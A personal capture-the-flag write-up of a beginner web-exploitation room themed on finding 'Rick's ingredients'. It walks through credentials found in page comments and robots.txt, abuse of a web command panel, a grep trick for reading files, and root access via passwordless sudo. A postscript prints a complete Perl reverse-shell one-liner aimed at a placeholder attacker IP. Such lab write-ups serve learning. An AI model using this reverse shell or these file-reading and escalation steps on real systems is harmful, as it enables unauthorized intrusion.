Hello friend.
This is a CTF-style room, so we don’t know a lot about it in the beginning. We need to log into the machine and find some flags. There is a web app running on it, so I take a look at it and on the index site we get our first hint in form of an HTML comment:
The banner image is stored in the /assets directory, what can we find there? Not much, so I start dirsearch.py with the standard wordlist:
In the robots.txt is no site but “Wubbalubbadubdub” is written into it – since we already found the username, might this be the password?
It actually is! Once we are logged in, we see a Command Panel, where you can execute shell commands. A few different tabs, that all give us a denied message. And in the HTML of the command panel is a comment again, with a base64 encoded string:
Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==
Well… yeah… so I put it into cyberchef and once you base64 decode it seven times you get the string “rabbit hole”. I guess that was a waste of time.
So let’s use the command panel a bit, if we ls -la, it shows us this:
Sadly, most tools to output text don’t work, but we can browse the files in our web browser, at least those in this directory. The clue says we should browse the file system for the other ingredients and in the Sup3rS3cretPickl3Ingred.txt we find the first one:
What is the first ingredient Rick needs?
mr. meeseek hair
What is the second ingredient Rick needs?
So… I tried a few things, like getting a reverse shell but my netcat listener just closed on connection. But I found another solution to view file content grep -f <path to file> <pathtofile> this tells grep to use each line of the file as a pattern, so if we grep a file with itself as a pattern, it prints the whole file. Kinda neat.
The second ingredient is in a file in /home/rick, so if we use grep -f /home/rick/second\\ ingredients /home/rick/second\\ ingredients it shows us:
1 jerry tear
What is the final ingredient Rick needs?
I looked around for a while longer and couldn’t find it. It is probably in the root directory. But we don’t have the permissions to access it. But maybe we can get them? With the sudo -l command you can see which commands your user may use in combination with the sudo command, aka root privileges:
This (ALL) NOPASSWD: ALL means, he can run all commands without even entering a password and with sudo ls /root we see, there is a suspicious 3rd.txt file in the root directory. With sudo grep -f /root/3rd.txt /root/3rd.txt
That’s it! We found all the ingredients – nice.
PS: I read another write up, because I got curious why my reverse shell wouldn’t work. It seems I just didn’t try the one payload which actually works:
perl -e 'use Socket;$i="ATTACKER-IP";$p=LISTENING-PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
This way you wouldn’t need the grep trick and could just use cat:
